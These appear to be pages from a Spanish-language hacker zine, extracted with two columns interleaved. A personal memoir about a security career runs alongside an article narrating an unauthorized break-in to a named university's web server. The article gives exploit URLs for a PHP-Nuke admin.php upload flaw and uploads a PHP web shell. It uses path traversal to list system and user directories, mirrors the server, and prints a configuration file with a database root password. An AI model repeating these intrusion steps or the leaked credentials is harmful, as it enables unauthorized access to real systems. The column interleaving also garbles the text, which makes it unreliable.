por ahí no carga… solo abran su google Y Una época bravísima… estábamos encaminando dad, haciendo ethical hacking, evaluaciones de
BUSQUENNOS… ajá… RTFM pero suavecito :p las cosas poco a poco… hacia donde queríamos… seguridad, así es… ya se lo que se imaginan… “Te
jejeje aunque ahora que lo veo luego de varios pagan por hackear?” no exactamente es hackear, es
kilómetros recorridos, era un sysadmin apaga evaluar la seguridad, pero bueno hacer escaneos,
Acá les dejo un mensaje que me gustó mucho… fuegos, pero como en la mayoría de los casos no encontrar fallas, probar la seguridad de empresas y
“los hackers nos recuerdan cada día que internet era mi culpa, era víctima del día a día, y no había todo eso.. si… por eso también te pagan… y saben
no es de nadie...” (Algún miembro de lophtcrack) tiempo para nada, ni procedimientos, ni están- que… no somos muchos los que hacemos esto… y
dares, ni revisiones… ni backups :S … bueno… a nunca debería ser un trabajo mal pagado, así que
veces el día a día realmente se hacía incierto… no permitan que les paguen poco por hacer esto de
podía ser un día de updatear mi base de MP3, y la seguridad, hay cosas que pueda que no veamos
otro día un día de apagar incendios con algún en este mundo pero que casi no tienen precio, la
Lo tan esperado por ustedes... “problemita” de esos sencillos que te quitan no confianza, el ser alguien confiable es difícil, la
la 3ra y última parte menos de 3 o 4 horas cada uno… experiencia, las horas de sueño que sacrificaste por
saber, por aprender, por descubrir, eso no te lo
Llegó mi último ciclo de universidad, 7 cursasos… pagó nadie… pues cuando empiezan a pagarte por
con un buen trabajo (divertido al menos) y 2 horas trabajar en esto… es el momento de cobrar los
Hoy ya a 8 años aproximadamente de cuando
de sueño (y aún no llegaba a la semana de prácti- impuestos y CON INTERESES…
empecé a escribir este relato y esta noche creo que
cas)… Se imaginan cuanto tiempo hubiera dor-
es momento de cerrar este circulo y completar esta
mido en en parciales y finales? Fue una difícil Puede sonar que estoy siendo ahora un mercantil-
parte de mi historia, quiero que entiendan que así
decisión pero dejé el trabajo (si, nuevamente…) ista mas… pero como creen que van a conseguir
como yo años después sigo viendo lo lejos que está
pero en ese momento lo mas importante era acabar los juguetes (los escaners de Wifi, la laptop, el
la meta al final del camino sin embargo me
mi carrera para mi, mi familia y todos los que me software, la línea Internet, el celular putón, las
enorgullece cada metro recorrido, ver como mi
conocían, todos contaban con que acabara mi maricadas como dicen algunos amigos colombi-
vida ha seguido su curso y espero que pronto
carrera, ya que aquí entre nos se la debía a mi anos) Creen que van a ser personas confiables
escuche cosas de ustedes también… vivan sus
abuelo que en paz descanse, a mi madre que está apllicando carding? No se pasen, es momento de
propias historias y aprovechen cada momento de
un toke lejos, a mi familia, a mi mismo. Dejé a la tomar conciencia y empezar a pensar que son
ellas…
chica de mis sueños también por cumplir con esta personas de bien, que tienen un skill, y que tiene
meta que era mi carrera, de verdad que ha sido un valor, que a veces ese valor sea mal pagado no
Nos quedamos en las primeras prácticas pre-
una de las pruebas mas difíciles que he tenido, significa que debe ser siempre así.
profesionales, los primeros cachuelos (que a veces
pero al final te das cuenta que el jugo vale la pena
en vez de ganar gastábamos, pero es parte de la
la exprimida… Cual es el problema o el pero ustedes dirán, que es
escuela y del aprendizaje). Seguía en la universi-
lo que se extraña con el tiempo? Pues ese tiempo al
dad, tuve que dejar esa práctica debido a proble-
Así que bueno… acabé la carrera, cerré un circulo que dedicaban para investigar, ese malogrando se
mas de salud, así que me alejé del tema técnico, me
mas en mi vida. aprende que guió sus vidas, esas ganas de apren-
dediqué a avanzar la carrera, a mi vida personal y
der casi asexuales. Que poco a poco se van mi-
demás… hasta que el bolsillo empezó a ajustar los
Si les hablo mucho de los círculos, tiene que ver nando con su cuota de entretenimiento y demás
pantalones y fue momento de buscar nuevamente
con la teoría de los círculos concéntricos de Gestalt, vicios jajaja
un trabajo que me facilite la vida mundana a la
si no me equivoco, en la cual entiendo que trata de
que me había acostumbrado jejeje…
que en la vida abrimos muchos círculos, y parte de Esa pureza de la sed de conocimiento, ese senti-
nuestra razón de ser en la vida (o algo así) es cerrar miento de sentir que todos los días aprendes algo
Por ahí surgió una oportunidad una práctica en
esos círculos, no se si exactamente es lo que signi- nuevo, y saber cada día que mientras mas apren-
una empresa de PC Routers con Linux, una mezcla
fica, pero así lo veo, y trato de cerrar la mayor des, es mas lo que te falta por aprender. Los miles
de hardware de pc, con interfases, y a Linux como
cantidad de círculos en mi vida. de libros que consigues, te bajas o compras, y que
sistema operativo, ahí vi de todo un poco, Hy-
Luego de acabar la universidad, y haber comple- ojalá algún día puedas leer. El bajar todo lo que se
perterminals, Routers en combo, recompiladas de
tado todas las metas a largo plazo que alguna vez pone en tu browser, y como poco a poco tienes que
kernel (aquella caja negra y desconocida), DNŚs,
pude proyectarme en mi vida, fue un momento de empezar a filtrar lo que bajas, por que sabes que no
Radius, RAS, en fin… de todo un poco…
indecisiones… que hacer, que quería ahora para mi todo lo podrás ver con calma, y bueno, por que

14 Lo que hagas en la vida, tendrá eco en la eternidad.


S E C U R I T Y W A R I P R O J E C T S

muchas de las cosas ya las leiste, y prefieres ap- http://www.rootshell.be/~doxicałexploits/misc-c


rovechar en leer otras cosas en vez de leer otro UNt Crack ó UNt Hack gi-php-asp/PHP-Nuke%205.2%20and%20prior%2
Escrito por ReYDeS
documento sobre el mismo tema… 0Upload%20File%20exploit.html

Disclaimer.
Y como poco a poco… el dinero te alcanza menos, Esto como lo mencione; permite automatizar el
El presente texto narra el ingreso al servidor de la Uni-
sin importar que cada vez ganes mas. Te acostum- test. En la misma, se recomienda usar el programa;
versidad Nacional de Trujillo (UNT)
bras a una vida que no se si algún día realmente o código denominado ‘PhpShell’;
http://www.unitru.edu.pe, Todo lo que se ha plasmado
puedas pagar… http://www.gimpster.com/wiki/PhpShell, el cual
aquí no se ha hecho con fines dañinos; tal vez lo único
permite; como su nombre lo indica; expandir el
dañino sea el consumo de ciclos de CPU.
Pero no hay por que desesperarse… sólo hay que uso de una shell en el server afectado.
RareGaZz Security Team y SWP; no necesariamente
darle para adelante, hay que aprovechar el tiempo
estan de acuerdo o comparten las acciones realizadas por
y sacarle el jugo a cada bit y a cada byte que cruza Acto seguido pues.. con la primera pagina men-
el Autor del presente texto. Use todo lo explicado aquí,
por nuestros ojos… cionada se procedió a ejecutar el test. ;)
bajo su propia responsabilidad.
Inicie con un escaneo; que novedad!; ;) y para este
Bueno… estuve un año trabajando en esta em- Los únicos datos que solicita dicha web; son la url
propósito, nada mejor que el Nessus. Personal-
presa, en la cual hice amigos con los que hasta hoy, exacta al file ‘admin.php’ y el file que se desea
mente es mi punto de inicio. ;) Este me revelo
4 años después, mantengo una muy buena amis- subir. En este caso el, ‘phpshell.php’.
interesantes vulnerabilidades en el server en cues-
tad. Se presentó una oportunidad de migrar a una
tión. La vulnerabilidad que percibí mas atractiva
empresa transnacional a ver consultoría en las Finalmente la d i re c c i o n exacta:
fue la que se reportó en el archivo ‘admin.php’.
grandes ligas, y bueno, es lo que en algún mo- www.unitru.edu.pe/admin.php
mento debí haber soñado, así que me mandé a esta Y lo que obtengo es: (Pego el código ASCII, la
PHP?. Un lenguaje utilizado para desarrollo web,
experiencia, la cual debo decir, hasta el día de hoy, salida es HTML)
que puede ser utilizado en HTML. Pero bueno, la
con uno que otro pero, ha sido una de las experi-
mayoría sabe de que va esto. =======HTMLASCII=======
encias mas enriquecedoras de mi vida, he crecido Menú de Administración

como profesional, he crecido como consultor y Salir

Iniciando la búsqueda para informarme mas sobre


como persona. He aprendido a no ser tan confiado Manejador de Archivos
esta falla; visite nuestro amigo “guuguel”.
también, no siempre se te acercan con buenas in- El Directorio Actual es: /
[ Volver al raiz | Recargar ]

tenciones, y a veces caes, pero lo importante es Subido phpshell.php --> /

De que va la falla?. Bueno veamos, perdón, leamos


saber levantarse y seguir adelante. Durante mis Tipo Nombre Tamaño Modificado Acción
Directorio superior 4k Directorio superior
:) Cambiar directorio de trabajo a XICONEE XICONEE 4k 09-10-2001 01:05:27 Mover,
épocas de “consultor costoso” he podido disfrutar renombrar o copiar XICONEE Tocar XICONEE Borrar XICONEE

PHP-Nuke, es un portal web de código abierto, Cambiar directorio de trabajo a actividades actividades 4k 04-07-2001 00:39:20
Mover, renombrar o copiar actividades Tocar actividades Borrar actividades
de brindarle servicios de consultoría en seguridad Cambiar directorio de trabajo a admin admin 4k 30-12-2002 03:29:59 Mover, renombrar
utilizado por muchos sitios en internet. A eso le o copiar admin Tocar admin Borrar admin

a grandes empresas, bancos, mineras, AFP´s en Cambiar directorio de trabajo a admision admision 4k 27-01-2003 23:24:43 Mover,
renombrar o copiar admision Tocar admision Borrar admision
llamo breve definición de algo. :D Cambiar directorio de trabajo a ali ali 4k 25-06-2002 09:02:17 Mover, renombrar o
fin… copiar ali Tocar ali Borrar ali
Cambiar directorio de trabajo a app app 4k 31-10-2001 01:49:49 Mover, renombrar o
copiar app Tocar app Borrar app
Cambiar directorio de trabajo a app1 app1 4k 23-02-2002 11:38:56 Mover, renombrar o
copiar app1 Tocar app1 Borrar app1
La vulnerabilidad, permite al atacante copiar Cambiar directorio de trabajo a archivos archivos 4k 26-03-2001 00:03:12 Mover,
Al inicio de este artículo dije que esperaba termi- renombrar o copiar archivos Tocar archivos Borrar archivos

archivos, y sobre escribir archivos sensibles del Cambiar directorio de trabajo a arq arq 8k 31-01-2003 02:24:32 Mover, renombrar o
copiar arq Tocar arq Borrar arq
nar esa noche… pero no fue así… ha pasado una Cambiar directorio de trabajo a autoridades autoridades 4k 03-07-2002 01:02:01
sistema. Esto podría permitir al atacante compro- Mover, renombrar o copiar autoridades Tocar autoridades Borrar autoridades

semana desde entonces. Han pasado muchas cosas Cambiar directorio de trabajo a bann bann 4k 31-10-2001 01:49:52 Mover, renombrar o
copiar bann Tocar bann Borrar bann
meter completamente el host remoto.
buenas dentro de esta semana… quiero compar- ...
Líneas y líneas --> Omitiendo...
...
tirlo con ustedes (antes que con mis jefes jejeje)…
http://www.securiteam.com/unixfocus/5FP0L1F Image wl_cccccc.gif 68b 29-10-2001 01:43:29 Move,rename or copy wl_cccccc.gif Touch
wl_cccccc.gif Delete wl_cccccc.gif Browse
Recibí un ofrecimiento de trabajo muy interesante Image wmail.gif 1.35k 29-10-2001 01:43:29 Move,rename or copy wmail.gif Touch
5FS.html wmail.gif Delete wmail.gif Browse

y lo he aceptado… En algún momento de mi vida Image wr.gif 82b 29-10-2001 01:43:29 Move,rename or copy wr.gif Touch wr.gif Delete
wr.gif Browse
Image wr_cccccc.gif 82b 29-10-2001 01:43:29 Move,rename or copy wr_cccccc.gif Touch
soñé con trabajar en una super transnacional y veía wr_cccccc.gif Delete wr_cccccc.gif Browse
Upload file
Sistemas vulnerables: Create directory
aquel sueño como una distante y quien sabe tal Create File (html template)
PHP-Nuke File Manager is Based on WebExplorer and has been integrated with the
PHP-Nuke 5.2 y anteriores author permission.
vez inalcanzable meta… saben que al trabajar en ...
...

esta empresa que dejo en estos días ese sueño fue


Aquí pego la corta explicación de la falla en cues- 2001 UNT.Networks. Todos los derechos reservados.

cumplido para mi… Hoy día me doy cuenta de =======HTMLASCII=======


tión:
muchas cosas, una de ellas es que no hay metas
inalcanzables… y otra que una vez que logras tus --> code --> Es un extenso listado, que nos permite comprobar
Codigo causante del fallo:
metas a largo plazo no debes dormirte en tus lau- El admin.php contiene la siguiente rutina:
que ‘hemos ingresado’. Eso es relativo; claro esta; o
$basedir = dirname($SCRIPT_FILENAME);
reles, celebrar está bien… pero que mejor que $textrows = 20;
al menos podemos visualizar el directorio raíz
$textcols = 85;
seguir creciendo y ser mas ambicioso cada día… $udir = dirname($PHP_SELF);
if(!$wdir) $wdir="/"; donde se hospeda la web. Pero cuando se intenta
if($cancel) $op="FileManager";
if($upload) {
copy($userfile,$basedir.$wdir.$userfile_name); ingresar directamente a los enlaces listados en
Alguíen dijo alguna vez que soñar no cuesta $lastaction = ""._UPLOADED." $userfile_name --> $wdir";
// This need a rewrite -------------------------------------> Aqui esta dicha pagina...
el problema: "Esto necesita volver a escribirse"
nada… otro dijo que no se puede vivir de los //include("header.php");
//GraphicAdmin($hlpfile);
sueños… sólo les puedo decir… que vivir haci- //html_header();
//displaydir(); Esto no es posible, obteniendose lo siguiente:
$wdir2="/";
endo tus sueños realidad es un lujo que ojalá todos chdir($basedir . $wdir2);
//CloseTable();
nos podamos dar… //include("footer.php");
Header("Location: admin.php?op=FileManager"); <html>
exit; <title>INTRUDER ALERT!!!</title>
}
<-- code <-- <body bgcolor="#FFFFFF" text="#000000">
Esta vez no voy a hacerla larga como en las otras 2 <br><br><br><center><img src="images/eyes.gif" border=0><br><br>
Esto no comprueba si has entrado como admin o no, Por lo tanto
puedes usarlo sin autentificación.
<font face="Verdana" size="+4"><b>Get Out!</b></font></center>
partes… sólo les puedo decir... que vivan como si </body>
Solución: </htm l >
La solución temporal puede ser cambiar:
fueran a morir mañana… y aprendan como si
"if($upload) {"
fueran a vivir toda la vida… Gracias amigos a
Jeje ;) Bonito gif de paso... :)
míos… Hoy ustedes y yo, cerramos un circulo mas "if (($upload) && ($admintest)) {" Ahora intento con la la siguiente url:
<--
en nuestras vidas.
http://www.unitru.edu.pe/admin.php?op=chdr&
Siguiendo con la búsqueda, localice una intere-
-= Juan Pablo Quiñe a.k.a. HaCKsPy =- sante dirección que permitía automatizar el ‘test’
file=%2Ftupa
Lo cual nos conduce a autentificarnos otra vez...
en cuestión.
Muy mal, no me se la clave. ;) Sino, no estaría haci-
endo esto. :S

Lo que hagas en la vida, tendrá eco en la eternidad. 15


S E C U R I T Y W A R I P R O J E C T S

Estamos aquí apara aprender y experimentar. A través del mecanismo antes mencionado po- Vamos primero al directorio superior, como lo
Probemos con admin=1 demos navegar directorios, ahora veamos si dije anteriormente al directorio raíz. :)
podemos hacer algo mas y descifrar los
http://www.unitru.edu.pe/admin.php?admin=1 parámetros clave. http://200.60.44.6/admin.php?upload=
&op=chdr&file=%2Ftupa 1&wdir=/../
Esto nos lleva de nuevo al anterior mensaje de Primera eliminación de parámetros; me quedo así: =======HTMLASCII=======

“Alerta de intruso!”. Jeje Que novedad!... Como si Menú de Administración

fuese la primera vez en la vida que veo o escucho http://www.unitru.edu.pe/admin.php?upload=1 Salir

eso. Tranquilos!.... &wdir=/images/admin/&userfile=config.php&us Manejador de Archivos

El Directorio Actual es: /../

Al intentar explotar el fallo, de la manera indicada erfile_name=hacked.txt [ Volver al raíz | Recargar ]

Subido --> /../

en el siguiente enlace:
Tipo Nombre Tamaño Modificado Acción

http://www.twlc.net/article.php?sid=421 Mas eliminaciones de parámetros; queda así: Directorio superior 4k Directorio superior
Cambiar directorio de trabajo a bin bin 4k 23-03-2001 09:29:48 Mover, renombrar o copiar
bin Tocar bin Borrar bin

Voy realizarlo literalmente, así es que en mi Cambiar directorio de trabajo a cgi-bin cgi-bin 4k 23-03-2001 09:29:51 Mover, renombrar
o copiar cgi-bin Tocar cgi-bin Borrar cgi-bin
Cambiar directorio de trabajo a conf conf 4k 23-03-2001 09:29:52 Mover, renombrar o

browser favorito escribo esto: http://www.unitru.edu.pe/admin.php?upload=1 copiar conf Tocar conf Borrar conf
Cambiar directorio de trabajo a gato gato 4k 10-10-2002 08:23:53 Mover, renombrar o
copiar gato Tocar gato Borrar gato

&wdir=/images/admin/ Cambiar directorio de trabajo a htdocs htdocs 8k 24-02-2003 23:47:00 Mover, renombrar o
copiar htdocs Tocar htdocs Borrar htdocs
Cambiar directorio de trabajo a icons icons 4k 23-03-2001 09:29:51 Mover, renombrar o
http://www.unitru.edu.pe/admin.php?upload=1 copiar icons Tocar icons Borrar icons
Cambiar directorio de trabajo a include include 4k 23-03-2001 09:29:48 Mover, renombrar
o copiar include Tocar include Borrar include
&file=config.php&file_name=hacked.txt&wdir=/i Con esto podemos listar. cualquier directorio. OH! Cambiar directorio de trabajo a libexec libexec 4k 23-03-2001 09:29:46 Mover, renombrar
o copiar libexec Tocar libexec Borrar libexec
Cambiar directorio de trabajo a logs logs 4k 12-03-2003 09:04:20 Mover, renombrar o
mages/&userfile=config.php&userfile_name=hack Que descubrimiento. ;) copiar logs Tocar logs Borrar logs
Cambiar directorio de trabajo a man man 4k 23-03-2001 09:29:46 Mover, renombrar o copiar
man Tocar man Borrar man
ed.txt Cambiar directorio de trabajo a proxy proxy 4k 23-03-2001 09:29:47 Mover, renombrar o
copiar proxy Tocar proxy Borrar proxy
Cambiar directorio de trabajo a reflexiones reflexiones 4k 05-08-2001 23:44:44 Mover,
Ahora vamos a ver nuevamente el código... Y al Voy a darle un wget -r -nc <directorio>, veremos renombrar o copiar reflexiones Tocar reflexiones Borrar reflexiones
Unknown filetype pagina.tar.gz 312.25m 16-04-2002 01:44:45 Move,rename or copy
pagina.tar.gz Touch pagina.tar.gz Delete pagina.tar.gz Browse Edit
dar a upload=1, y los parámetros indicamos en la que pasa.... =======HTMLASCII=======

anterior url, ocurre esto:


Y momentos después me bajo y bajo files, casi todo
--> code --> Vamos al directorio /etc, cuando aprenderemos; o
if($upload) { el server :o) Mejor lo dejo allí. :-O
copy($userfile,$basedir.$wdir.$userfile_name); mejor dicho, aprendere a no hacer esto?. Bueno, el
$lastaction = ""._UPLOADED." $userfile_name --> $wdir"; Un backup nunca esta de mas. =)
$wdir2="/"; instinto llama. :)
chdir($basedir . $wdir2);
Header("Location: admin.php?op=FileManager");
exit; --*
}
http://200.60.44.6/admin.php?upload=1&wdir=/.
Segunda entrada.... El regreso del tipo! o terque-
<-- code <-- ./../etc/
dad. :D
=======HTMLASCII=======

Las cosas parecen que cambiaron un poco: Mejor copy inetd.conf Touch inetd.conf Delete inetd.conf Browse Edit
Unknown filetype inittab 2.71k 22-03-2001 18:53:09 Move,rename or copy inittab Touch inittab
Esto nos lleva al directorio images, pero dándonos Delete inittab Browse Edit

dicho, yo cambie un poco. >:) jeje! Web program inittab.gettyps.sample 2.1k 22-03-2001 18:52:47 Move,rename or copy
inittab.gettyps.sample Touch inittab.gettyps.sample Delete inittab.gettyps.sample Browse
el error de no haber podido subir el file. :) Bueno, Edit
Unknown filetype ioctl.save 60b 12-03-2003 09:04:05 Move,rename or copy ioctl.save Touch
ioctl.save Delete ioctl.save Browse Edit
en realidad de copiar el file. Supuestamente esto Web program isapnp.conf-sample 776b 22-03-2001 18:52:50 Move,rename or copy isapnp.conf-
sample Touch isapnp.conf-sample Delete isapnp.conf-sample Browse Edit
Ahora vamos a lo más interesante, quiero ver la Web program isapnp.gone-sample 994b 22-03-2001 18:52:50 Move,rename or copy isapnp.gone-
copiaba en el archivo “hacked.txt” en config.php. sample Touch isapnp.gone-sample Delete isapnp.gone-sample Browse Edit
Unknown filetype issue 26b 12-03-2003 09:04:05 Move,rename or copy issue Touch issue Delete
raíz... anda escarba hijo! No Papa... quiero ver la issue Browse Edit

Pero!!!... Unknown filetype issue.net 275b 23-03-2001 06:56:54 Move,rename or copy issue.net Touch
issue.net Delete issue.net Browse Edit
raíz del sistema. Aja... pues a leer mas se ha dicho. Unknown filetype ld.so.cache 8.39k 12-03-2003 09:04:18 Move,rename or copy ld.so.cache Touch
ld.so.cache Delete ld.so.cache Browse Edit
Unknown filetype ld.so.conf 154b 22-03-2001 18:52:58 Move,rename or copy ld.so.conf Touch
Y con las lecturas resultaba relativamente fácil ld.so.conf Delete ld.so.conf Browse Edit

Warning: Unable to create Unknown filetype lilo.conf 365b 23-03-2001 07:20:05 Move,rename or copy lilo.conf Touch
lilo.conf Delete lilo.conf Browse Edit
reconocer que se podía hacer escalada de directo- ...

‘/www/htdocs/images/hacked.txt’: Permission Lineas y lineas --> Omitiendo...


...
rios. Entonces: Unknown filetype localtime 146b 22-03-2001 18:54:04 Move,rename or copy localti

denied in /www/htdocs/admin.php on line 400 Unknown filetype sudoers 294b 22-03-2001 18:53:33 Move,rename or copy sudoers Touch sudoers
Delete sudoers Browse Edit
Unknown filetype syslog.conf 619b 22-03-2001 18:52:52 Move,rename or copy syslog.conf Touch
syslog.conf Delete syslog.conf Browse Edit
Unknown filetype termcap 7.7k 22-03-2001 18:52:49 Move,rename or copy termcap Touch termcap
Delete termcap Browse Edit
Unknown filetype termcap-BSD 614.72k 22-03-2001 18:52:50 Move,rename or copy termcap-BSD
Entonces... deducción simple; para esto si me fun- Touch termcap-BSD Delete termcap-BSD Browse Edit

http://200.60.44.6/admin.php?upload=1&wdir=/. Unknown filetype wgetrc 3.24k 22-03-2001 18:56:06 Move,rename or copy wgetrc Touch wgetrc
Delete wgetrc Browse Edit
ciona el cerebro; en cambio para otras cosas :-O. Web program yp.conf.example 147b 22-03-2001 18:56:22 Move,rename or copy yp.conf.example

./../../ Touch yp.conf.example Delete yp.conf.example Browse Edit


Unknown filetype zprofile 2.22k 22-03-2001 18:52:49 Move,rename or copy zprofile Touch
jeje, podemos escalar y porque no modificar files. zprofile Delete zprofile Browse Edit

=======HTMLASCII=======
=======HTMLASCII=======
=======HTMLASCII=======
Manejador de Archivos
Menú de Administración
El Directorio Actual es: /../../../
Salir [ Volver al raíz | Recargar ] Vamos al /home/; a casa!!! Mirare un rato por allí;
Manejador de Archivos
Subido --> /../../../
que es lo que nos deparan los interesantes usuarios
El Directorio Actual es: /images/
[ Volver al raíz | Recargar ]
Tipo Nombre Tamaño Modificado Acción
Directorio superior 4k Directorio superior
;). Revisen logs muchachos que no estoy borrando
Cambiar directorio de trabajo a bin bin 4k 22-03-2001 18:56:22 Mover,
Subido hacked.txt --> /images/ renombrar o copiar bin Tocar bin Borrar bin nada ;)
Cambiar directorio de trabajo a boot boot 1k 23-03-2001 07:20:08 Mover,
renombrar o copiar boot Tocar boot Borrar boot
Tipo Nombre Tama ño Modificado Acci ón Cambiar directorio de trabajo a cdrom cdrom 4k 22-03-2001 18:52:42 Mover,
Directorio superior 4k Directorio superior renombrar o copiar cdrom Tocar cdrom Borrar cdrom
Cambiar directorio de trabajo a admin admin 4k 24-03-2001 00:37:58 Mover, Cambiar directorio de trabajo a dev dev 28k 12-03-2003 09:04:14 Mover,
renombrar o copiar dev Tocar dev Borrar dev
http://200.60.44.6/admin.php?upload=1&wdir=/.
renombrar o copiar admin Tocar admin Borrar admin
Cambiar directorio de trabajo a disquete disquete 4k 29-11-2001 08:56:14
Cambiar directorio de trabajo a banners banners 4k 24-03-2001 00:37:58 Mover,
renombrar o copiar banners Tocar banners Borrar banners Mover, renombrar o copiar disquete Tocar disquete Borrar disquete ./../home/
Cambiar directorio de trabajo a download download 4k 24-03-2001 00:37:58 Cambiar directorio de trabajo a etc etc 4k 12-03-2003 09:04:18 Mover,
Mover, renombrar o copiar download Tocar download Borrar download renombrar o copiar etc Tocar etc Borrar etc
Cambiar directorio de trabajo a forum forum 4k 24-03-2001 00:38:00 Mover, Cambiar directorio de trabajo a home home 4k 12-02-2003 02:28:03 Mover,
renombrar o copiar forum Tocar forum Borrar forum renombrar o copiar home Tocar home Borrar home =======HTMLASCII=======
Cambiar directorio de trabajo a links links 4k 24-03-2001 00:38:00 Mover, Cambiar directorio de trabajo a lib lib 4k 22-03-2001 18:55:59 Mover,
renombrar o copiar links Tocar links Borrar links renombrar o copiar lib Tocar lib Borrar lib Menú de Administración
Cambiar directorio de trabajo a logo logo 4k 30-10-2001 01:01:21 Mover, Cambiar directorio de trabajo a lost+found lost+found 16k 22-03-2001 18:51:12
Salir
renombrar o copiar logo Tocar logo Borrar logo Mover, renombrar o copiar lost+found Tocar lost+found Borrar lost+found
Cambiar directorio de trabajo a menu menu 4k 24-03-2001 00:38:00 Mover, Cambiar directorio de trabajo a mnt mnt 4k 22-03-2001 18:52:42 Mover,
renombrar o copiar menu Tocar menu Borrar menu renombrar o copiar mnt Tocar mnt Borrar mnt Manejador de Archivos
Cambiar directorio de trabajo a powered powered 4k 24-03-2001 00:38:00 Mover, Cambiar directorio de trabajo a proc proc 0b 12-03-2003 04:03:57 Mover,
renombrar o copiar proc Tocar proc Borrar proc El Directorio Actual es: /../../home/
renombrar o copiar powered Tocar powered Borrar powered
Cambiar directorio de trabajo a root root 4k 22-02-2003 10:25:13 Mover, [ Volver al raíz | Recargar ]
Cambiar directorio de trabajo a reviews reviews 4k 24-03-2001 00:38:00 Mover,
renombrar o copiar reviews Tocar reviews Borrar reviews renombrar o copiar root Tocar root Borrar root Subido --> /../../home/
... Cambiar directorio de trabajo a sbin sbin 4k 19-10-2002 19:23:01 Mover,
Lineas y lineas --> Omitiendo... renombrar o copiar sbin Tocar sbin Borrar sbin
... Cambiar directorio de trabajo a shlib shlib 4k 22-03-2001 18:52:58 Mover, Tipo Nombre Tamaño Modificado Acción
renombrar o copiar shlib Tocar shlib Borrar shlib Directorio superior 4k Directorio superior
Cambiar directorio de trabajo a dwong dwong 4k 11-03-2003 02:52:07 Mover, renombrar o copiar
Image lrepublica.gif 3.7k 13-08-2001 01:40:04 Move,rename or copy Cambiar directorio de trabajo a tmp tmp 4k 16-03-2003 04:41:23 Mover, dwong Tocar dwong Borrar dwong
lrepublica.gif Touch lrepublica.gif Delete lrepublica.gif Browse renombrar o copiar tmp Tocar tmp Borrar tmp Cambiar directorio de trabajo a eponte eponte 4k 27-02-2003 02:14:14 Mover, renombrar o
Image lycosLogo.gif 1.79k 13-08-2001 01:40:04 Move,rename or copy Cambiar directorio de trabajo a usr usr 4k 19-10-2002 19:23:01 Mover, copiar eponte Tocar eponte Borrar eponte
lycosLogo.gif Touch lycosLogo.gif Delete lycosLogo.gif Browse renombrar o copiar usr Tocar usr Borrar usr Cambiar directorio de trabajo a ftp ftp 4k 23-03-2001 05:55:23 Mover, renombrar o copiar ftp
Cambiar directorio de trabajo a var var 4k 22-03-2001 18:57:15 Mover, Tocar ftp Borrar ftp
Image lycosl~1.gif 1.79k 13-08-2001 01:40:04 Move,rename or copy lycosl~1.gif Cambiar directorio de trabajo a gato gato 4k 14-08-2002 22:14:14 Mover, renombrar o copiar
Touch lycosl~1.gif Delete lycosl~1.gif Browse renombrar o copiar var Tocar var Borrar var
gato Tocar gato Borrar gato
Cambiar directorio de trabajo a www www 4k 10-10-2002 08:23:53 Mover, Cambiar directorio de trabajo a jchong jchong 4k 31-01-2003 02:16:54 Mover, renombrar o
... renombrar o copiar www Tocar www Borrar www copiar jchong Tocar jchong Borrar jchong
... Cambiar directorio de trabajo a kayluss kayluss 4k 14-08-2002 22:23:53 Mover, renombrar o
=======HTMLASCII======= copiar kayluss Tocar kayluss Borrar kayluss
Unknown filetype webmaster 5.96k 10-07-2001 23:48:55 Move,rename or copy webmaster Touch
=======HTMLASCII======= webmaster Delete webmaster Browse Edit

=======HTMLASCII=======

Allí esta el listado del directorio /images/. Vamos


Bueno; si se fijan bien; allí verán al /etc /var
bien.. o al menos por buen camino. 8) :O) Esos nombresitos me resultan muy familiares.
/home etc. Estamos en la raíz. =)
:) Revisar antiguas ediciones de RareGaZz para
mas información. :D

16 Lo que hagas en la vida, tendrá eco en la eternidad.


S E C U R I T Y W A R I P R O J E C T S

razonamiento simple, si no puedo escribir en el Una rápida búsqueda en la web; da la siguiente <?PHP

######################################################################

directorio /images que la url muestra como un dirección, http://www.yabbse.org/ informa que # PHP-NUKE: Web Portal System
# ===========================
#

path por defecto; obviamente en /tmp si podría- es un software para foros que trabaja con PHP y # Copyright (c) 2000 by Francisco Burzi (fburzi@ncc.org.ve)
# http://phpnuke.org
#
# This module is to configure the main options for your site
mos; así es que; allí vamos. MySQL. #
# This program is free software. You can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
O sea que puedo instalar mi propio foro? :o. Gen- # the Free Software Foundation; either version 2 of the License.
######################################################################

http://200.60.44.6/admin.php?upload=1&file=con ial!!!... ######################################################################


# Database & System Config
#
fig.php&file_name=cf.txt&wdir=/../../tmp/&user Veamos: # dbhost: MySQL Database Hostname
# dbuname: MySQL Username
# dbpass: MySQL Password
file=config.php&userfile_name=hf.txt # dbname:
# system:
MySQL Database Name
0 for Unix/Linux, 1 for Windows
######################################################################

$dbhost = "localhost";
=======HTMLASCII======= $dbuname = "root";
Aqui se indica la creacion de un archivo de nom- $dbpass = "drac0";
$dbname = "nuke";
YaBB SE Installer $system = 0;
bre ‘hf.txt’, el cual debe ser una copia del archivo /*********************************************************************/
Safe Mode Check: /* You finished to configure the Database. Now you can change all */
‘config.php’, que no es mas que el archivo de /* you want in the Administration Section. To enter just launch
/* you web browser pointing to http://yourdomain.com/admin.php
*/
*/
/* */
configuración del PHPNuke; el cual contiene algu- /* At the prompt use the following ID to login (case sensitive):
/*
*/
*/
It appears that safe mode has been disabled. /* AdminID: God */
nas cosas interesantes; como las claves?. :-O /* Password: Password
/*
*/
*/
You may continue. /* Be sure to change inmediately the God login & password clicking */
/* on Edit Admin in the Admin menu. After that, click on Preferences */
/* to configure your new site. In that menu you can change all you */
=======HTMLASCII======= /* need to change. */
/* */
/* Remember to chmod 666 this file in order to let the system write */
Manejador de Archivos

El Directorio Actual es: /../../../../../../../tmp/


Click here to continue. /* to it properly. If you can't change the permissions you can edit */
/* the rest of this file by hand. */
/* */
[ Volver al raíz | Recargar ]

Subido hf.txt --> /../../../../../../../tmp/


=======HTMLASCII======= /* Congratulations! now you have an automated news portal!
/* Thanks for choose PHP-Nuke: The Future of the Web
*/
*/
/*********************************************************************/

Tipo Nombre Tamaño Modificado Acción


Directorio superior 4k Directorio superior
Cambiar directorio de trabajo a .X11 .X11 4k 06-10-2002 17:31:22 Mover, renombrar o copiar Hmmm.. click? :) ######################################################################
# General Site Configuration
.X11 Tocar .X11 Borrar .X11
Cambiar directorio de trabajo a .X11-unix .X11-unix 4k 22-03-2001 18:52:50 Mover, #
renombrar o copiar .X11-unix Tocar .X11-unix Borrar .X11-unix # $sitename: Your Site Name
Cambiar directorio de trabajo a .cash3001 .cash3001 4k 21-11-2002 02:00:08 Mover, # $nuke_url: Complete URL for your site (Do not put / at end)
